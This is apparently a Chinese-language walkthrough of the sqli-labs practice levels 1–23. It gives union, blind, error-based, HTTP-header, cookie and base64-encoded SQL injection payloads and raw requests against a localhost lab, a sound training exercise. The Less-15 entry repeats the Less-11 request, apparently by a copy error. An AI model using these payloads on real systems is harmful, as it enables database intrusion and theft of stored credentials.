Less-1
payload:'+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+
第一关正规的字符型SQL注入,单引号报错,常规注入即可
Less-2
payload:+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+
第二关数字型SQL注入,直接跟payload即可,通过and 1=1 ,and 1=2发现注入点
Less-3
payload:')+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+
第三关为小括号包裹的字符型注入,发现注入点之后使用payload即可
Less-4
payload:")+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+
第四关为小括号包裹的字符型注入
Less-5
payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+
布尔盲注脚本:
此脚本只将数据库爆出,具体还需要自己更改。
Less-6
payload1(探测长度,以database()为例):"+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):"+and+(select+mid(database(),1,1)='s')--+
同第五关,脚本稍作更改也可使用
Less-7
payload1(探测长度,以database()为例):'))+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):'))+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
时间盲注,通过if语句判断,争取则延时3秒,否则不延时。
Less-8
payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+
同第五关
Less-9
payload1(探测长度,以database()为例):'+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):'+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
同第七关,单引号字符型延时盲注
Less-10
payload1(探测长度,以database()为例):"+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):"+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
Less-11
payload:
POST /sqli-labs/Less-11/ HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Referer: http://localhost/sqli-labs/Less-11/?id=1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 79uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
常规的post注入,万能密码等。
Less-12
payload:
POST /sqli-labs/Less-12/ HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Referer: http://localhost/sqli-labs/Less-12/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 110uname=admin&passwd=123") and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
Less-13
poc:
POST /sqli-labs/Less-13/ HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Referer: http://localhost/sqli-labs/Less-13/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 74uname=admin&passwd=123') or (select length(database())=8)-- &submit=Submit
post类型的布尔盲注,密码处通过 or 来判断真假
Less-14
poc:
POST /sqli-labs/Less-14/ HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Referer: http://localhost/sqli-labs/Less-14/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 67uname=1&passwd=1" or (select length(database())=8)-- &submit=Submit
同第十三关
Less-15
payload:
POST /sqli-labs/Less-11/ HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Referer: http://localhost/sqli-labs/Less-11/?id=1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 79uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
Less-16
poc:
POST /sqli-labs/Less-16/ HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Referer: http://localhost/sqli-labs/Less-16/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 74uname=admin&passwd=123") or (select length(database())=8)-- &submit=Submit
Less-17
poc:
POST /sqli-labs/Less-17/ HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Referer: http://localhost/sqli-labs/Less-17/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 100uname=secure&passwd=admin' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- &submit=Submit
报错注入,之前一直用这个payload:
select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a
但一直都不对,知道读源码才知道对长度进行了限制,所以使用这个payload:
updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
发现报错成功。
Less-18
poc:
POST /sqli-labs/Less-18/ HTTP/1.1Host: localhostUser-Agent: ' or updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) or 'Accept-Language: en-US,en;q=0.5Referer: http://localhost/sqli-labs/Less-18/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 34uname=admin&passwd=0&submit=Submit
看源码发现,是将User-Agent未过滤插入数据库中,此时构造报错注入:updatexml(1,concat(0x7e,(SELECT user()),0x7e),1),从而产生sql http头注入。
Less-19
poc:
POST /sqli-labs/Less-19/ HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Referer: ' or updatexml(1,concat(0x7e,(select user()),0x7e),1) or 'Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 34uname=admin&passwd=0&submit=Submit
同第十八关一样,不过登录进去时发现会将referer输出,于是修改referer的值,报错成功。
Less-20
poc:
GET /sqli-labs/Less-20/ HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Cookie: uname=admin' and 1=2 union select user(),version(),database()--+Connection: close
cookie注入,当登录进去时,发现会将User-Anget,referer,cookie输出到页面中,然后刷新,抓包,替换cookie为payload即可。
Less-21
poc:
GET /sqli-labs/Less-21/ HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Cookie: uname=YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxIw==Connection: close
payload使用base64编码,并且注入点使用单引号和小括号包裹 ')
payload: admin') and 1=2 union select 1,username,password from security.users limit 0,1#
Less-22
poc:
GET /sqli-labs/Less-22/ HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Cookie: uname=YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IDEsdXNlcm5hbWUscGFzc3dvcmQgZnJvbSBzZWN1cml0eS51c2VycyBsaW1pdCAwLDEtLSA=Connection: close
payload:admin" and 1=2 union select 1,username,password from security.users limit 0,1--
Less-23
payload: ' and '1'='2' union select '1',username,password from security.users limit 0,1;%00
多次尝试基本确定 # 与 -- 是被过滤掉了的,于是尝试新的注释方法: ;%00 于是注释成功。